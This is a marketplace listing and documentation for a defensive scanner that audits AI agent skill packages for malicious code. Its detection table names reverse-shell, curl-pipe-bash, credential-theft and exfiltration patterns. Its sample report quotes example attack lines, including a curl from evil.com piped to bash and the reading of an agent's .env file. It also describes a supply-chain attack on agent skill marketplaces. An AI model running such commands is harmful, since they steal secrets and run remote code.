โ† All skills
Tencent SkillHub ยท Developer Tools

Clawhub Skill Scanner

Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.

skill openclawclawhub Free
0 Downloads
0 Stars
0 Installs
0 Score
High Signal

Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.

โฌ‡ 0 downloads โ˜… 0 stars Unverified but indexed

Install for OpenClaw

Quick setup
  1. Download the package from Yavira.
  2. Extract the archive and review SKILL.md first.
  3. Import or place the package into your OpenClaw setup.

Requirements

Target platform
OpenClaw
Install method
Manual import
Extraction
Extract archive
Prerequisites
OpenClaw
Primary doc
SKILL.md

Package facts

Download mode
Yavira redirect
Package format
ZIP package
Source platform
Tencent SkillHub
What's included
README.md, SKILL.md, references/threat-patterns.md, scripts/scan_skill.py

Validation

  • Use the Yavira download entry.
  • Review SKILL.md after the package is downloaded.
  • Confirm the extracted package contains the expected setup assets.

Install with your agent

Agent handoff

Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.

  1. Download the package from Yavira.
  2. Extract it into a folder your agent can access.
  3. Paste one of the prompts below and point your agent at the extracted folder.
New install

I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete.

Upgrade existing

I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run.

Trust & source

Release facts

Source
Tencent SkillHub
Verification
Indexed source record
Version
0.1.0

Documentation

ClawHub primary doc Primary doc: SKILL.md 11 sections Open source page

Skill Security Audit

MANDATORY security check before installing external skills. Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.

When to Use

Run this audit BEFORE any skill installation: clawhub install <skill> Manual skill download/copy Skills from GitHub, URLs, or untrusted sources

Quick Start

# Scan a skill folder python3 scripts/scan_skill.py /path/to/skill # JSON output for automation python3 scripts/scan_skill.py /path/to/skill --json # Exit code 0 only if SAFE python3 scripts/scan_skill.py /path/to/skill --install-if-safe

๐Ÿ”ด CRITICAL (Blocks Installation)

CategoryPatternsReverse Shellsnc -e, bash /dev/tcp, Python socket shellsCurl-Pipe-Bashcurl | bash, wget && chmod +xCredential Access~/.ssh, ~/.aws, ~/.openclaw, .env filesData ExfiltrationDiscord/Slack webhooks, POST with secretsMalicious Domainsglot.io, pastebin (known malware hosts)Persistencecrontab, systemd, LaunchAgents, .bashrcCommand Injectioneval(), exec(), subprocess shell=TrueObfuscationbase64 decode pipes, pickle, marshal

๐ŸŸก WARNING (Review Required)

Only patterns that are suspicious regardless of skill type: Raw socket usage (unusual for most skills) Dynamic code compilation File/directory deletion Screenshot/keyboard capture libraries Low-level system calls (ctypes)

Philosophy

We intentionally don't warn on common patterns like: HTTP requests (normal for API skills) API key references (normal for integration skills) File writes (normal for data skills) Environment variable access (normal for config) This reduces noise so real threats stand out.

Risk Scoring

CRITICAL findings ร— 30 = Base score WARNING findings ร— 3 (capped at 10) = Warning contribution ScoreLevelAction0-20๐ŸŸข SAFEAuto-approve21-50๐ŸŸก CAUTIONReview findings51-80๐Ÿ”ถ DANGERDetailed review required81-100๐Ÿ”ด BLOCKEDDo NOT install

Sample Output

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• SKILL SECURITY AUDIT: suspicious-skill โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• ๐Ÿ“Š RISK SCORE: 90/100 - ๐Ÿ”ด BLOCKED ๐Ÿ”ด CRITICAL FINDINGS (3) [install.py:15] Curl pipe to shell (DANGEROUS!) Code: os.system('curl https://evil.com/x.sh | bash') [setup.py:42] Discord webhook exfiltration Code: requests.post('https://discord.com/api/webhooks/...') [run.py:8] ClawdBot .env access (ClawHavoc target!) Code: open(os.path.expanduser('~/.clawdbot/.env')) ๐Ÿ“ FILES SCANNED: 5 ๐Ÿ“ TOTAL LINES: 230 โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• ๐Ÿ”ด BLOCK - Do NOT install this skill โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

Integration with clawhub

Create a wrapper script to auto-scan before installation: #!/bin/bash # clawhub-secure: Scan before install SKILL="$2" TEMP="/tmp/skill-audit-$$" # Fetch without installing clawhub inspect "$SKILL" --out "$TEMP" # Scan python3 /path/to/scan_skill.py "$TEMP" --install-if-safe if [ $? -eq 0 ]; then clawhub install "$SKILL" else echo "๐Ÿ”ด Installation blocked by security scan" exit 1 fi rm -rf "$TEMP"

References

See references/threat-patterns.md for detailed pattern explanations.

Credits

Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.

Category context

Code helpers, APIs, CLIs, browser automation, testing, and developer operations.

Source: Tencent SkillHub

Largest current source with strong distribution and engagement signals.

Package contents

Included in package
3 Docs1 Scripts
  • SKILL.md Primary doc
  • README.md Docs
  • references/threat-patterns.md Docs
  • scripts/scan_skill.py Scripts